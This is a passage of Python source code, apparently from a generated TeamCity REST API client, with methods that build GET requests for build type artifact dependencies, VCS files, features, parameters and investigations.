        '/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='ArtifactDependencies',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_build_types_with_http_info(self, **kwargs):  # noqa: E501
    """get_build_types  # noqa: E501

    List build types, optionally filtered by a locator.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str locator:
    :param str fields:
    :return: BuildTypes
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_build_types" % key
            )
    params = dict(kwargs)

    query_params = []
    if 'locator' in params:
        query_params.append(('locator', params['locator']))
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
        '/app/rest/buildTypes', 'GET',
        {},                       # path params
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='BuildTypes',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_children_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_children  # noqa: E501

    List the files under `path` in the build type's latest VCS content.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.__get_children_with_http_info(path, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str base_path:
    :param str locator:
    :param str fields:
    :param bool resolve_parameters:
    :return: Files
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['path', 'bt_locator', 'base_path', 'locator', 'fields', 'resolve_parameters']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Merge keyword arguments, rejecting unknown ones.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_children" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'path' is set
    if ('path' not in params or
            params['path'] is None):
        raise ValueError("Missing the required parameter `path` when calling `get_children`")  # noqa: E501
    # verify the required parameter 'bt_locator' is set
    if ('bt_locator' not in params or
            params['bt_locator'] is None):
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_children`")  # noqa: E501
    # Raw strings below fix the invalid '\/' string escape the generator
    # emitted (DeprecationWarning today, SyntaxError in future Pythons);
    # the regex itself is unchanged ('\/' and '/' match identically).
    # NOTE(review): the fully-optional group means this pattern matches
    # any string, so the ValueError is effectively unreachable — kept for
    # parity with the generated API contract.
    if 'path' in params and not re.search(r'(/.*)?', params['path']):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `path` when calling `get_children`, must conform to the pattern `/(\/.*)?/`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'path' in params:
        if isinstance(params['path'], TeamCityObject):
            # Locator wrappers carry the raw string in locator_id.
            path_params['path'] = params['path'].locator_id
        else:
            path_params['path'] = params['path']  # noqa: E501
    if 'bt_locator' in params:
        if isinstance(params['bt_locator'], TeamCityObject):
            path_params['btLocator'] = params['bt_locator'].locator_id
        else:
            path_params['btLocator'] = params['bt_locator']  # noqa: E501

    query_params = []
    if 'base_path' in params:
        query_params.append(('basePath', params['base_path']))  # noqa: E501
    if 'locator' in params:
        query_params.append(('locator', params['locator']))  # noqa: E501
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    if 'resolve_parameters' in params:
        query_params.append(('resolveParameters', params['resolve_parameters']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/children{path}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Files',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_children_alias_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_children_alias  # noqa: E501

    List the files under `path` in the build type's latest VCS content
    (alias endpoint).
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str base_path:
    :param str locator:
    :param str fields:
    :param bool resolve_parameters:
    :return: Files
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('path', 'bt_locator', 'base_path', 'locator', 'fields',
                'resolve_parameters', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_children_alias" % key
            )
    params = dict(kwargs)
    params['path'] = path
    params['bt_locator'] = bt_locator

    if params['path'] is None:
        raise ValueError("Missing the required parameter `path` when calling `get_children_alias`")  # noqa: E501
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_children_alias`")  # noqa: E501
    # Generated pattern check (the optional group matches any string).
    if not re.search('(.*)?', params['path']):  # noqa: E501
        raise ValueError("Invalid value for parameter `path` when calling `get_children_alias`, must conform to the pattern `/(.*)?/`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'path': _locator(params['path']),
        'btLocator': _locator(params['bt_locator']),
    }
    query_params = []
    for py_name, wire_name in (('base_path', 'basePath'),
                               ('locator', 'locator'),
                               ('fields', 'fields'),
                               ('resolve_parameters', 'resolveParameters')):
        if py_name in params:
            query_params.append((wire_name, params[py_name]))

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/{path}', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='Files',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_content_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_content  # noqa: E501

    Download the content of the file at `path` from the build type's
    latest VCS content.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.__get_content_with_http_info(path, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str response_builder:
    :param bool resolve_parameters:
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['path', 'bt_locator', 'response_builder', 'resolve_parameters']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Merge keyword arguments, rejecting unknown ones.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_content" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'path' is set
    if ('path' not in params or
            params['path'] is None):
        raise ValueError("Missing the required parameter `path` when calling `get_content`")  # noqa: E501
    # verify the required parameter 'bt_locator' is set
    if ('bt_locator' not in params or
            params['bt_locator'] is None):
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_content`")  # noqa: E501
    # Raw strings below fix the invalid '\/' string escape the generator
    # emitted (DeprecationWarning today, SyntaxError in future Pythons);
    # the regex itself is unchanged ('\/' and '/' match identically).
    # NOTE(review): the fully-optional group means this pattern matches
    # any string, so the ValueError is effectively unreachable — kept for
    # parity with the generated API contract.
    if 'path' in params and not re.search(r'(/.*)?', params['path']):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `path` when calling `get_content`, must conform to the pattern `/(\/.*)?/`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'path' in params:
        if isinstance(params['path'], TeamCityObject):
            # Locator wrappers carry the raw string in locator_id.
            path_params['path'] = params['path'].locator_id
        else:
            path_params['path'] = params['path']  # noqa: E501
    if 'bt_locator' in params:
        if isinstance(params['bt_locator'], TeamCityObject):
            path_params['btLocator'] = params['bt_locator'].locator_id
        else:
            path_params['btLocator'] = params['bt_locator']  # noqa: E501

    query_params = []
    if 'response_builder' in params:
        query_params.append(('responseBuilder', params['response_builder']))  # noqa: E501
    if 'resolve_parameters' in params:
        query_params.append(('resolveParameters', params['resolve_parameters']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/content{path}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_content_alias_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_content_alias  # noqa: E501

    Download the content of the file at `path` from the build type's
    latest VCS content (alias endpoint).

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.__get_content_alias_with_http_info(path, bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param bool resolve_parameters:
    :return: None
             If the method is called asynchronously,
             returns the request thread.
    """
    all_params = ['path', 'bt_locator', 'resolve_parameters']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Merge keyword arguments, rejecting unknown ones.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_content_alias" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'path' is set
    if ('path' not in params or
            params['path'] is None):
        raise ValueError("Missing the required parameter `path` when calling `get_content_alias`")  # noqa: E501
    # verify the required parameter 'bt_locator' is set
    if ('bt_locator' not in params or
            params['bt_locator'] is None):
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_content_alias`")  # noqa: E501
    # Raw strings below fix the invalid '\/' string escape the generator
    # emitted (DeprecationWarning today, SyntaxError in future Pythons);
    # the regex itself is unchanged ('\/' and '/' match identically).
    # NOTE(review): the fully-optional group means this pattern matches
    # any string, so the ValueError is effectively unreachable — kept for
    # parity with the generated API contract.
    if 'path' in params and not re.search(r'(/.*)?', params['path']):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `path` when calling `get_content_alias`, must conform to the pattern `/(\/.*)?/`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'path' in params:
        if isinstance(params['path'], TeamCityObject):
            # Locator wrappers carry the raw string in locator_id.
            path_params['path'] = params['path'].locator_id
        else:
            path_params['path'] = params['path']  # noqa: E501
    if 'bt_locator' in params:
        if isinstance(params['bt_locator'], TeamCityObject):
            path_params['btLocator'] = params['bt_locator'].locator_id
        else:
            path_params['btLocator'] = params['bt_locator']  # noqa: E501

    query_params = []
    if 'resolve_parameters' in params:
        query_params.append(('resolveParameters', params['resolve_parameters']))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = []  # noqa: E501

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/files{path}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type=None,  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_current_vcs_instances_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_current_vcs_instances  # noqa: E501

    List the current VCS root instances of a build type.
    Synchronous by default; pass async_req=True for an asynchronous call.

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: VcsRootInstances
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword argument this endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_current_vcs_instances" % key
            )
    params = dict(kwargs)
    params['bt_locator'] = bt_locator

    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_current_vcs_instances`")  # noqa: E501

    def _locator(value):
        # TeamCityObject wrappers expose their raw locator via locator_id.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {'btLocator': _locator(params['bt_locator'])}
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcsRootInstances', 'GET',
        path_params,
        query_params,
        {},                       # header params
        body=None,
        post_params=[],
        files={},
        response_type='VcsRootInstances',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __get_current_vcs_instances_obsolete_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_current_vcs_instances_obsolete  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_current_vcs_instances_obsolete_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: VcsRootInstances
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_current_vcs_instances_obsolete" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_current_vcs_instances_obsolete`")  # noqa: E501
    # A TeamCityObject contributes its locator id to the URL path.
    locator = bt_locator.locator_id if isinstance(bt_locator, TeamCityObject) else bt_locator
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-instances', 'GET',
        {'btLocator': locator},
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='VcsRootInstances',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_example_new_project_description_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_example_new_project_description  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_example_new_project_description_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :return: NewBuildTypeDescription
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_example_new_project_description" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_example_new_project_description`")  # noqa: E501
    # A TeamCityObject contributes its locator id to the URL path.
    locator = bt_locator.locator_id if isinstance(bt_locator, TeamCityObject) else bt_locator
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/example/newBuildTypeDescription', 'GET',
        {'btLocator': locator},
        [],
        {},
        body=None,
        post_params=[],
        files={},
        response_type='NewBuildTypeDescription',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_example_new_project_description_compatibility_version1_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_example_new_project_description_compatibility_version1  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_example_new_project_description_compatibility_version1_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :return: NewBuildTypeDescription
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_example_new_project_description_compatibility_version1" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_example_new_project_description_compatibility_version1`")  # noqa: E501
    # A TeamCityObject contributes its locator id to the URL path.
    locator = bt_locator.locator_id if isinstance(bt_locator, TeamCityObject) else bt_locator
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/newBuildTypeDescription', 'GET',
        {'btLocator': locator},
        [],
        {},
        body=None,
        post_params=[],
        files={},
        response_type='NewBuildTypeDescription',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_feature_with_http_info(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """get_feature  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_feature_with_http_info(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str fields:
    :return: Feature
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'feature_id', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_feature" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature`")  # noqa: E501
    if feature_id is None:
        raise ValueError("Missing the required parameter `feature_id` when calling `get_feature`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _as_locator(bt_locator),
        'featureId': _as_locator(feature_id),
    }
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}', 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Feature',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_feature_parameter_with_http_info(self, bt_locator, feature_id, parameter_name, **kwargs):  # noqa: E501
    """get_feature_parameter  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str parameter_name: (required)
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'feature_id', 'parameter_name', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_feature_parameter" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_parameter`")  # noqa: E501
    if feature_id is None:
        raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_parameter`")  # noqa: E501
    if parameter_name is None:
        raise ValueError("Missing the required parameter `parameter_name` when calling `get_feature_parameter`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _as_locator(bt_locator),
        'featureId': _as_locator(feature_id),
        'parameterName': _as_locator(parameter_name),
    }
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters/{parameterName}', 'GET',
        path_params,
        [],
        {},
        body=None,
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_feature_parameters_with_http_info(self, bt_locator, feature_id, **kwargs):  # noqa: E501
    """get_feature_parameters  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_feature_parameters_with_http_info(bt_locator, feature_id, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str fields:
    :return: Properties
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'feature_id', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_feature_parameters" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_parameters`")  # noqa: E501
    if feature_id is None:
        raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_parameters`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _as_locator(bt_locator),
        'featureId': _as_locator(feature_id),
    }
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters', 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Properties',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_feature_setting_with_http_info(self, bt_locator, feature_id, name, **kwargs):  # noqa: E501
    """get_feature_setting  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_feature_setting_with_http_info(bt_locator, feature_id, name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str name: (required)
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'feature_id', 'name', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_feature_setting" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_feature_setting`")  # noqa: E501
    if feature_id is None:
        raise ValueError("Missing the required parameter `feature_id` when calling `get_feature_setting`")  # noqa: E501
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `get_feature_setting`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'btLocator': _as_locator(bt_locator),
        'featureId': _as_locator(feature_id),
        'name': _as_locator(name),
    }
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/{name}', 'GET',
        path_params,
        [],
        {},
        body=None,
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_features_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_features  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_features_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Features
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_features" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_features`")  # noqa: E501
    # A TeamCityObject contributes its locator id to the URL path.
    locator = bt_locator.locator_id if isinstance(bt_locator, TeamCityObject) else bt_locator
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features', 'GET',
        {'btLocator': locator},
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Features',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_investigations_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """get_investigations  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_investigations_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :return: Investigations
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_investigations" % key
            )
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_investigations`")  # noqa: E501
    # A TeamCityObject contributes its locator id to the URL path.
    locator = bt_locator.locator_id if isinstance(bt_locator, TeamCityObject) else bt_locator
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/investigations', 'GET',
        {'btLocator': locator},
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Investigations',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_metadata_with_http_info(self, path, bt_locator, **kwargs):  # noqa: E501
    """get_metadata  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.__get_metadata_with_http_info(path, bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str path: (required)
    :param str bt_locator: (required)
    :param str fields:
    :param bool resolve_parameters:
    :return: File
    If the method is called asynchronously,
    returns the request thread.
    """
    all_params = ['path', 'bt_locator', 'fields', 'resolve_parameters']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    # Fold validated keyword arguments into the params dict.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_metadata" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'path' is set
    if ('path' not in params or
            params['path'] is None):
        raise ValueError("Missing the required parameter `path` when calling `get_metadata`")  # noqa: E501
    # verify the required parameter 'bt_locator' is set
    if ('bt_locator' not in params or
            params['bt_locator'] is None):
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_metadata`")  # noqa: E501
    # Raw strings fix the deprecated `\/` escape sequence (SyntaxWarning
    # on CPython 3.12+) without changing a single byte of the pattern or
    # the message.
    # NOTE(review): the whole pattern `(\/.*)?` is optional, so
    # re.search always matches and the ValueError below is unreachable;
    # kept for parity with the generated OpenAPI spec.
    if 'path' in params and not re.search(r'(\/.*)?', params['path']):  # noqa: E501
        raise ValueError(r"Invalid value for parameter `path` when calling `get_metadata`, must conform to the pattern `/(\/.*)?/`")  # noqa: E501
